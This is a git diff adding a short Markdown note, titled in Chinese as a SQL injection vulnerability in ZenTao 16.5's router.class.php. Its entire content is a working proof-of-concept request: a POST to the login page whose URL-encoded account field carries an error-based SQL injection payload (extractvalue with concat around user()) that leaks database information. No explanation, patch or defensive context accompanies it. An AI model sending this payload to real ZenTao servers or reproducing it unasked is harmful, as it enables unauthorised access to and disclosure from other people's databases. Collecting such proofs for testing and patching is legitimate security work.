diff --git a/禅道 16.5 router.class.php SQL注入漏洞.md b/禅道 16.5 router.class.php SQL注入漏洞.md
new file mode 100644
index 0000000..738edf6
--- /dev/null
+++ b/禅道 16.5 router.class.php SQL注入漏洞.md	
@@ -0,0 +1,5 @@
+## 禅道 16.5 router.class.php SQL注入漏洞
+```
+POST /user-login.html 
+account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
+```